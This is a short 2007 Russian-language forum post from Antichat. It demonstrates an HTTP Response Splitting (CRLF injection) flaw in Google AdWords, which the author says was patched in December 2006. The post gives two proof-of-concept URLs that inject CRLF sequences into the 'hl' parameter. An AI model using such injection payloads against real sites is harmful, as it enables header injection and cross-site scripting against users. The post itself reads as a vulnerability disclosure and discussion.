
18.04.2007, 19:42
|
|
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме: 7134052
Репутация:
1204
|
|
Итак, наконец нашел время для демонстрации конкретной уязвимости (уже неактуальной, пофиксена в декабре 2006) на примере Google Adwords с использованием техники HTTP Response Splitting (частный случай CRLF injection в заголовке HTTP протокола).
FYI: статья из соседнего раздела HTTP Response Splitting: разделяй и властвуй.
Подверженные атаке запросы:
Код:
https://adwords.google.com/select/ProfessionalWelcome?hl=%0D%0Afakeheader&null=Go%20HTTP/1.0
https://adwords.google.com/select/Login?hl=%0D%0Afakeheader&null=Go%20HTTP/1.0
Таким образом мы можем сформировать прозвольный второй ответ, но вот каково его реальное использование кроме всяких XSS, я что-то не соображу. =(
В багтраке лежит немало уязвимостей подобного рода кстати.
|
|
|